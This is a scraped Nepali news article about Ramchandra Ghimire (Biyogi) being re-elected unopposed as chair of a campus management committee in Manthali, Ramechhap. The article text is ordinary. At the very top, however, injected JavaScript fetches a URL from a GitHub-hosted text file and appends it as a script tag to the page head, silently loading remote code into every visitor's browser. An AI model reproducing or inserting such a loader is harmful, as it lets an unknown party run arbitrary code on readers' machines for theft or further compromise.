;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); मन्थली सहिद स्मृति क्याम्पसको अध्यक्षमा वियोगी निर्विरोध निर्वाचित् – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • मन्थली सहिद स्मृति क्याम्पसको अध्यक्षमा वियोगी निर्विरोध निर्वाचित्
देश/प्रदेश

मन्थली सहिद स्मृति क्याम्पसको अध्यक्षमा वियोगी निर्विरोध निर्वाचित्

फागुन ०९,

रामेछाप । रामेछापको मन्थलीस्थित्, मन्थली सहिद स्मृति बहुमुखी क्याम्पस सञ्चालक समितिको अध्यक्षमा पुनः रामचन्द्र घिमिरे (वियोगी) निर्विरोध चयन भएका छन् । शनिबार भएको एक भेलाबाट वियोगीलाई पुःनह् अध्यक्षमा निर्विरोध चयन  गरेको हो ।

यसअघि सोही क्याम्पसका पूर्व क्याम्पस् प्रमुख गुञ्जबहादुर श्रेष्ठबीच प्रतिस्प्रर्धा हुने भनिएको थियो । तर शनिबार भएको भेलाले सर्वसमत् रुपमा सहमति गर्दै वियोगिलाई अध्यक्षको जिम्मेवारी दिएको हो ।

त्यसैगरी क्याम्पसको समितिमा अन्य ५ जना सदस्यहरु पनि निर्विरोध चयन भएका छन् । चयन हुनेहरुमा प्रकाश कुमार कार्की, उज्वल सुवेदी, रमेश ढुंगेल, युवराज सुवेदी, देवीका पौडेल रहेका छन् ।

त्यसैगरि क्याम्पस प्रमुख ऋषी कार्की सदस्य सचिवमा चयन भएका छन् ।  त्यसैगरी सञ्चालक समितिको बैठकले गंगालाल गोले, कुमार श्रेष्ठ, दिनेश सुवेदी, गंगा अधिकारीलाई क्याम्पस सञ्चालक समितिको सदस्यमा मनोनित गरेको छ ।file photo

 

फेसबुक प्रतिक्रियाहरु